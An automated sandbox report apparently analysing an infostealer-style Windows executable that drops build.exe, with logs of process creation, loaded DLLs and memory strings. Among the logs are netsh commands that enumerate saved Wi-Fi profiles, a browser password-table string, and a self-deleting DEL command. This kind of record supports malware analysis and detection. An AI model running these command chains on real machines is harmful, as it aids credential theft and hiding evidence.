Windows Analysis Report
file.exe

Source: C:\Users\user\AppData\Local\Temp\build.exe

Process token adjusted: Security

Source: file.exe, 00000000.00000000.1233237472.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenames3c8aa2da262e434f4e3f03592028b88bd3d913.exed" vs file.exe
Source: file.exe, 00000000.00000002.1237653819.00000000008A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenames3c8aa2da262e4 vs file.exe
Source: file.exe, 00000000.00000002.1237653819.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: build.exe.0.dr, dD4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, dD4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3685570.1.raw.unpack, dD4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: build.exe.0.dr, crH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: build.exe.0.dr, crH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3685570.1.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.3685570.1.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/5@2/4

Source: C:\Users\user\AppData\Local\Temp\build.exe

Code function: 2_2_00007FFAACCEED85 AdjustTokenPrivileges,

2_2_00007FFAACCEED85

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Source: C:\Users\user\AppData\Local\Temp\build.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\build.exe	Mutant created: \Sessions\1\BaseNamedObjects\560ppofpuc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\build.exe

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: build.exe, 00000002.00000002.2295681999.0000026B66B48000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66B35000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

